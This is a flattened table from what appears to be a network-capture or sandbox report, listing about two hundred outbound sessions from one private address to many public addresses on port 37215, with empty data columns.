                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9779192.168.2.1359848197.148.117.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9780192.168.2.133548441.113.51.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9781192.168.2.134942441.80.56.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9782192.168.2.134419441.171.202.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9783192.168.2.1358494197.147.25.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9784192.168.2.1358130197.209.205.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9785192.168.2.1355866157.4.36.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9786192.168.2.1334716197.198.65.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9787192.168.2.1354254182.86.47.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9788192.168.2.1333084197.22.119.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9789192.168.2.1348434197.74.35.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9790192.168.2.1357692157.16.126.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9791192.168.2.134560041.76.73.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9792192.168.2.135141635.247.149.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9793192.168.2.1354024121.236.38.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9794192.168.2.1358804132.39.114.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9795192.168.2.133484041.83.177.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9796192.168.2.1350906150.10.92.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9797192.168.2.1351302169.6.53.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9798192.168.2.134289041.164.55.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9799192.168.2.133685641.197.194.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9800192.168.2.1354134197.85.1.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9801192.168.2.1353142157.163.196.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9802192.168.2.1342454157.165.113.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9803192.168.2.134697641.15.66.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9804192.168.2.1341370157.129.84.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9805192.168.2.1344330157.102.25.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9806192.168.2.1337612197.148.107.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9807192.168.2.1358598157.91.186.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9808192.168.2.133954041.72.254.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9809192.168.2.1345246197.187.156.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9810192.168.2.1349228197.31.85.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9811192.168.2.135183841.175.174.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9812192.168.2.1356574197.184.73.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9813192.168.2.135650241.15.164.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9814192.168.2.1350572157.245.93.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9815192.168.2.134913441.139.225.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9816192.168.2.1351866169.76.99.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9817192.168.2.1341188157.198.49.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9818192.168.2.1353520190.8.68.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9819192.168.2.1349396197.255.100.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9820192.168.2.1357896157.250.184.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9821192.168.2.1353470197.219.21.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9822192.168.2.1352814197.165.226.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9823192.168.2.135771031.22.5.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9824192.168.2.135146279.75.242.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9825192.168.2.134041041.91.154.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9826192.168.2.134361070.173.118.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9827192.168.2.135065473.235.221.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9828192.168.2.135959641.117.11.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9829192.168.2.1336900110.97.205.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9830192.168.2.134589241.2.226.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9831192.168.2.1345696197.133.62.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9832192.168.2.1334780157.217.215.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9833192.168.2.1349250197.55.169.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9834192.168.2.135861841.129.165.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9835192.168.2.136012041.58.181.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9836192.168.2.1336030222.41.91.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9837192.168.2.1332794157.26.114.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9838192.168.2.1341850197.222.57.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9839192.168.2.1335696197.1.227.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9840192.168.2.1342798161.207.245.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9841192.168.2.134669234.74.89.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9842192.168.2.134367641.26.106.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9843192.168.2.1336904157.231.114.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9844192.168.2.135414241.67.123.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9845192.168.2.1354150157.16.155.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9846192.168.2.1351822157.117.204.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9847192.168.2.1349318157.53.125.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9848192.168.2.1355174197.191.12.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9849192.168.2.133911475.104.141.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9850192.168.2.135814041.54.113.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9851192.168.2.1338648139.74.131.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9852192.168.2.134547441.150.133.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9853192.168.2.1360976157.232.36.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9854192.168.2.133330841.204.248.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9855192.168.2.1358170186.65.77.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9856192.168.2.1350518157.86.164.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9857192.168.2.1341278132.5.55.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9858192.168.2.1357140157.138.161.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9859192.168.2.1351212197.78.127.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9860192.168.2.1338282157.230.5.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9861192.168.2.1348278157.210.168.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9862192.168.2.1341064197.40.58.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9863192.168.2.1333544122.199.75.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9864192.168.2.134252441.161.123.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9865192.168.2.1343720107.89.56.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9866192.168.2.135908041.146.250.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9867192.168.2.1358138131.43.77.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9868192.168.2.133746041.192.249.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9869192.168.2.135795041.90.91.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9870192.168.2.1355856181.185.27.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9871192.168.2.135475467.222.238.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9872192.168.2.1356358197.219.244.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9873192.168.2.133409041.125.55.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9874192.168.2.134359841.158.139.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9875192.168.2.1349300140.68.196.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9876192.168.2.1354584197.21.236.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9877192.168.2.1350894197.255.145.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9878192.168.2.1354564176.137.215.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9879192.168.2.1341020109.160.214.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9880192.168.2.1354974197.66.131.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9881192.168.2.135787060.28.244.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9882192.168.2.1359830140.155.105.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9883192.168.2.133393041.201.72.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9884192.168.2.1338776170.197.117.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9885192.168.2.1346578197.6.37.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9886192.168.2.133317641.3.97.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9887192.168.2.134933841.166.224.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9888192.168.2.1360454104.13.135.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9889192.168.2.1337596157.119.185.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9890192.168.2.1346594157.172.161.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9891192.168.2.134352441.186.196.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9892192.168.2.133387441.159.113.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9893192.168.2.135020841.164.41.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9894192.168.2.1359058197.233.117.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9895192.168.2.134388441.105.82.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9896192.168.2.13358549.173.82.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9897192.168.2.1335414197.75.167.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9898192.168.2.1340144157.203.182.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9899192.168.2.13413205.0.105.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9900192.168.2.134514641.83.8.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9901192.168.2.133942241.220.240.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9902192.168.2.1338304157.178.237.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9903192.168.2.1355406157.77.38.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9904192.168.2.1357414157.44.185.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9905192.168.2.1356300197.10.210.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9906192.168.2.1335828197.215.85.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9907192.168.2.134392841.81.230.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9908192.168.2.1335814157.173.113.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9909192.168.2.1358012197.151.16.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9910192.168.2.1343438197.38.68.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9911192.168.2.133315441.242.78.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9912192.168.2.135588041.143.192.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9913192.168.2.135355241.109.232.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9914192.168.2.1337166197.86.223.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9915192.168.2.1342272157.224.173.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9916192.168.2.1359896157.167.219.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9917192.168.2.1348398211.189.51.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9918192.168.2.1336662159.184.160.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9919192.168.2.135296468.85.87.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9920192.168.2.1353520157.158.241.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9921192.168.2.1344086197.12.146.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9922192.168.2.134682641.100.72.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9923192.168.2.134955841.17.197.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9924192.168.2.133758241.250.234.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9925192.168.2.135406841.205.246.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9926192.168.2.1359272197.149.19.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9927192.168.2.1352088197.22.143.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9928192.168.2.1333970197.226.52.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9929192.168.2.1358634146.215.144.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9930192.168.2.1352932197.46.131.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9931192.168.2.135067241.188.210.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9932192.168.2.136021441.123.160.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9933192.168.2.1333780157.112.67.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9934192.168.2.1354772146.108.228.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9935192.168.2.1342708197.21.56.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9936192.168.2.1346634157.64.1.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9937192.168.2.1351816157.102.224.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9938192.168.2.135185041.183.209.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9939192.168.2.135997841.217.235.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9940192.168.2.134993665.69.80.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9941192.168.2.1349512157.56.209.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9942192.168.2.1354064157.80.137.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9943192.168.2.1348082197.29.72.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9944192.168.2.134894641.93.128.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9945192.168.2.1343232197.124.196.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9946192.168.2.135279241.243.52.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9947192.168.2.1345860201.169.36.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9948192.168.2.133669241.45.208.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9949192.168.2.1352346197.55.196.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9950192.168.2.1339706157.213.172.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9951192.168.2.1349306218.227.144.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9952192.168.2.1347064197.62.42.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9953192.168.2.133483841.255.196.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9954192.168.2.1356854105.145.214.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9955192.168.2.1351672157.171.93.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9956192.168.2.135467273.140.242.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9957192.168.2.135506284.216.24.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9958192.168.2.1349266197.37.106.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9959192.168.2.135124241.164.215.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9960192.168.2.1353048197.92.3.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9961192.168.2.1341202197.220.137.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9962192.168.2.133861874.217.45.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9963192.168.2.1358620197.208.25.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9964192.168.2.1357680157.66.200.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9965192.168.2.1353438197.250.221.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9966192.168.2.133833641.18.48.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9967192.168.2.1358474157.19.22.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9968192.168.2.1332964112.43.214.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9969192.168.2.1336650208.43.1.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9970192.168.2.1347166105.17.21.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9971192.168.2.1345120197.250.132.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9972192.168.2.1356172197.60.172.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9973192.168.2.133873241.224.121.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9974192.168.2.1335380197.97.140.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9975192.168.2.135887041.43.37.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9976192.168.2.134806441.196.244.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9977192.168.2.135657065.16.109.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9978192.168.2.1355518123.187.140.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9979192.168.2.1355712197.244.35.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9980192.168.2.1341906197.121.193.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9981192.168.2.135175041.16.22.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9982192.168.2.1353804143.115.179.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9983192.168.2.135076841.79.157.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9984192.168.2.1344098157.228.79.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9985192.168.2.133622841.248.17.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9986192.168.2.135953612.216.139.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9987192.168.2.133841857.57.138.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
